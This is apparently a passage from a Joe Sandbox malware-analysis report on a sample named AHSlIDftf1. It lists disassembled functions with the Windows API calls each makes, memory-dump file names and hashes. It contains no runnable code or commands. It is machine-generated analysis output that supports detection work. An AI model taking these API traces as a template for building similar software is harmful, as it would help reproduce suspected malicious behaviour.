                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                            • String ID:
                                                                                                            • API String ID: 1413079979-0
                                                                                                            • Opcode ID: 2ac1cf5dc52ceeaaa573f8e60c0180d1e71d96f6dcb1ad05e7d7e3200171cc87
                                                                                                            • Instruction ID: 6d8ba7afc2439370a7ee5dab8bb09fb2fa5f627cf825825b41079d25e7fe60b7
                                                                                                            • Opcode Fuzzy Hash: 2ac1cf5dc52ceeaaa573f8e60c0180d1e71d96f6dcb1ad05e7d7e3200171cc87
                                                                                                            • Instruction Fuzzy Hash: 04114476500249EBDB12DFA8DD89BDE7BA9FB48704F484025FA06A6160C371CE619B70
                                                                                                            Function 00D73382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00D73379,00D72FE5), ref: 00D73390
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D7339E
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D733B7
                                                                                                            • SetLastError.KERNEL32(00000000,?,00D73379,00D72FE5), ref: 00D73409
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 1297699ab1ef36453d2fe078b74ecfa1e766004f0eda104d5f610be46d98202c
                                                                                                            • Instruction ID: b86bc634accfd5391748dbe039e8b2b24ae9e1fbd1c5af735d31f448cca1b7da
                                                                                                            • Opcode Fuzzy Hash: 1297699ab1ef36453d2fe078b74ecfa1e766004f0eda104d5f610be46d98202c
                                                                                                            • Instruction Fuzzy Hash: 61012432248311BEA7253BB9BC859AB2A95EB09379330C22AF418D42F0FF114D067674
                                                                                                            Function 00D82D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00D85686,00D93CD6,?,00000000,?,00D85B6A,?,?,?,?,?,00D7E6D1,?,00E18A48), ref: 00D82D78
                                                                                                            • _free.LIBCMT ref: 00D82DAB
                                                                                                            • _free.LIBCMT ref: 00D82DD3
                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00D7E6D1,?,00E18A48,00000010,00D54F4A,?,?,00000000,00D93CD6), ref: 00D82DE0
                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00D7E6D1,?,00E18A48,00000010,00D54F4A,?,?,00000000,00D93CD6), ref: 00D82DEC
                                                                                                            • _abort.LIBCMT ref: 00D82DF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160817290-0
                                                                                                            • Opcode ID: cbb1abd6b149e8ae263440cebc5551bb4d7e9766afcd677a4b31fc247a9047c0
                                                                                                            • Instruction ID: f6fa67f2cd784dcadd1990afb987f326d56ae261fc52fbce2ed4cf61e5092ceb
                                                                                                            • Opcode Fuzzy Hash: cbb1abd6b149e8ae263440cebc5551bb4d7e9766afcd677a4b31fc247a9047c0
                                                                                                            • Instruction Fuzzy Hash: 71F0C8366856003BC6123739BC06F7B2969EFC17B1F294418F828E62D2EF249C0243B1
                                                                                                            Function 00DE8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D69693
                                                                                                              • Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696A2
                                                                                                              • Part of subcall function 00D69639: BeginPath.GDI32(?), ref: 00D696B9
                                                                                                              • Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696E2
                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00DE8A4E
                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00DE8A62
                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00DE8A70
                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00DE8A80
                                                                                                            • EndPath.GDI32(?), ref: 00DE8A90
                                                                                                            • StrokePath.GDI32(?), ref: 00DE8AA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                            • String ID:
                                                                                                            • API String ID: 43455801-0
                                                                                                            • Opcode ID: 5efcc055334c31b720025aa8afbb8e8652555319ac17a8a60f275714a52f1682
                                                                                                            • Instruction ID: 4bf4a8a8fec615512121e4c1096208dfbe5f6e6ddb5ede030c052c1881bd463e
                                                                                                            • Opcode Fuzzy Hash: 5efcc055334c31b720025aa8afbb8e8652555319ac17a8a60f275714a52f1682
                                                                                                            • Instruction Fuzzy Hash: 6411CC7600024DFFDF12AF95DC88E9A7F6DEB04394F048061FA199A1A1C7719D56DB70
                                                                                                            Function 00DB51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 00DB5218
                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DB5229
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DB5230
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00DB5238
                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DB524F
                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00DB5261
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Release
                                                                                                            • String ID:
                                                                                                            • API String ID: 1035833867-0
                                                                                                            • Opcode ID: 18bcefe779b29594ed870ba54a04b528066dcceccea1f5fb3a67bce6ae753618
                                                                                                            • Instruction ID: 7f7a6be6e57aa957241e18ff035c2892612b40cb8bea637d1ef6f4363f9ae360
                                                                                                            • Opcode Fuzzy Hash: 18bcefe779b29594ed870ba54a04b528066dcceccea1f5fb3a67bce6ae753618
                                                                                                            • Instruction Fuzzy Hash: 7B014F75A01758BBEB10ABE59C89B5EBFB8EF48751F044065FA05EB391D6709801CBB0
                                                                                                            Function 00D51BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D51BF4
                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D51BFC
                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D51C07
                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D51C12
                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D51C1A
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D51C22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4278518827-0
                                                                                                            • Opcode ID: f4fc85c5f26ba173bc0708e0de38a98ffa07f2743613ae66ce0bc216e8b5df2a
                                                                                                            • Instruction ID: f03dbf30139d0e57485b2dfbe905839d25bb5307e4ab85e6775e634c6c0e3cf0
                                                                                                            • Opcode Fuzzy Hash: f4fc85c5f26ba173bc0708e0de38a98ffa07f2743613ae66ce0bc216e8b5df2a
                                                                                                            • Instruction Fuzzy Hash: D30148B09027597DE3009F5A8C85A52FFA8FF19354F00411B915C4BA41C7B5A864CBE5
                                                                                                            Function 00DBEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DBEB30
                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DBEB46
                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00DBEB55
                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DBEB64
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DBEB6E
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DBEB75
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 839392675-0
                                                                                                            • Opcode ID: d9789e6e2e557c06deb8a99188b70e754bdabcae1f583374d269b6e31034f6d7
                                                                                                            • Instruction ID: 6b1edd5d2cfc6fa19c8e09ea2c6dbdec65b28d62c615377d63a4ac0a648526ef
                                                                                                            • Opcode Fuzzy Hash: d9789e6e2e557c06deb8a99188b70e754bdabcae1f583374d269b6e31034f6d7
                                                                                                            • Instruction Fuzzy Hash: ACF03072250298BBE72167529C4DEEF3A7CEFCAB11F001158FA01D5291D7A05A02C6B5
                                                                                                            Function 00DA7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?), ref: 00DA7452
                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00DA7469
                                                                                                            • GetWindowDC.USER32(?), ref: 00DA7475
                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00DA7484
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00DA7496
                                                                                                            • GetSysColor.USER32(00000005), ref: 00DA74B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 272304278-0
                                                                                                            • Opcode ID: ec06db0e3f472a5d7fcc302ec95b7a17cdb960f72969165c5560e4562d7d8b58
                                                                                                            • Instruction ID: fd0d55d464a83bb6a9fe1f110167dae4a969779da037048c513a8612deb20cfb
                                                                                                            • Opcode Fuzzy Hash: ec06db0e3f472a5d7fcc302ec95b7a17cdb960f72969165c5560e4562d7d8b58
                                                                                                            • Instruction Fuzzy Hash: AF018B31410355EFDB116F64DC48BAA7BB5FB08311F151064F926E62B0CB311E42AB60
                                                                                                            Function 00DB1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DB187F
                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00DB188B
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DB1894
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DB189C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00DB18A5
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB18AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 146765662-0
                                                                                                            • Opcode ID: 761852c8a8131691403da7539b06a3da4e743fa896ecfca9fb5374e8d3f69b66
                                                                                                            • Instruction ID: 8e28fc2a87a02343fe6da69b2b22bb8e9059336aae1d8882541a0adc3877557a
                                                                                                            • Opcode Fuzzy Hash: 761852c8a8131691403da7539b06a3da4e743fa896ecfca9fb5374e8d3f69b66
                                                                                                            • Instruction Fuzzy Hash: 95E0C236114341BBDB016BA1ED4C90ABB29FB5AB22B909220F625C9270CB329422DB70
                                                                                                            Function 00D5BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00D5BEB3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Init_thread_footer
                                                                                                            • String ID: D%$D%$D%$D%
                                                                                                            • API String ID: 1385522511-2722557190
                                                                                                            • Opcode ID: 4485cd63973966fcbb44f448ae117aacd324dc70b1e00a0fe8bf4349a05e087a
                                                                                                            • Instruction ID: 9c97b68d7b93915b660e06c9e6f4015bf35db884f8760c5a71de2a58c352e6fe
                                                                                                            • Opcode Fuzzy Hash: 4485cd63973966fcbb44f448ae117aacd324dc70b1e00a0fe8bf4349a05e087a
                                                                                                            • Instruction Fuzzy Hash: C8910975A0020ADFCF14CF69C0916B9B7F1FF58321B28815AED95AB351D731E985CBA0
                                                                                                            Function 00DBC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DBC6EE
                                                                                                            • _wcslen.LIBCMT ref: 00DBC735
                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DBC79C
                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DBC7CA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 1227352736-4108050209
                                                                                                            • Opcode ID: be10fb4194bec49b25775000d0f6081847ea9969a9ee6d5268be0a7465d71d00
                                                                                                            • Instruction ID: f20d77fd4f5c9dd31f163c18512b2d6329827932b1c312504f6a12c2a85375bd
                                                                                                            • Opcode Fuzzy Hash: be10fb4194bec49b25775000d0f6081847ea9969a9ee6d5268be0a7465d71d00
                                                                                                            • Instruction Fuzzy Hash: 9651C371624340DBD7149F28D885AAB77E4FF89310F08292DF996D31A0DB60D904CB72
                                                                                                            Function 00DDAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00DDAEA3
                                                                                                              • Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625
                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 00DDAF38
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDAF67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                            • String ID: <$@
                                                                                                            • API String ID: 146682121-1426351568
                                                                                                            • Opcode ID: a37eb7ed1fe8567c3e7fbf0c16c4905d897ce60e037763680bd2386aa3fa8ddb
                                                                                                            • Instruction ID: 8abedcb7c7f33cafdf9113585001de879bddd2bdf7ec9522c9cd01225bee719b
                                                                                                            • Opcode Fuzzy Hash: a37eb7ed1fe8567c3e7fbf0c16c4905d897ce60e037763680bd2386aa3fa8ddb
                                                                                                            • Instruction Fuzzy Hash: E0714671A00615DFCF14EF68D484A9EBBF0EF08314F18849AE856AB392D774ED45CBA1
                                                                                                            Function 00DB719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00DB7206
                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DB723C
                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DB724D
                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DB72CF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                            • String ID: DllGetClassObject
                                                                                                            • API String ID: 753597075-1075368562
                                                                                                            • Opcode ID: 52cf3eefa59a64d219fccbc203686c7995c57010c585ed9f45985be34f5250fc
                                                                                                            • Instruction ID: afea03b3b8c9169df2a6017ec35c59fbfff85591dc8b20762439b0696d7b07bd
                                                                                                            • Opcode Fuzzy Hash: 52cf3eefa59a64d219fccbc203686c7995c57010c585ed9f45985be34f5250fc
                                                                                                            • Instruction Fuzzy Hash: CB415D71A04204EFDB15DF64C884ADA7BA9EF84310F1480ADBD069F20AD7B1DA45CBB4
                                                                                                            Function 00DE3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DE3E35
                                                                                                            • IsMenu.USER32(?), ref: 00DE3E4A
                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DE3E92
                                                                                                            • DrawMenuBar.USER32 ref: 00DE3EA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                            • Opcode ID: 0f2c94b9dc5f8f822fb3d9632f83ef4dda9e7e84c4a0506c949fd02ecf904f31
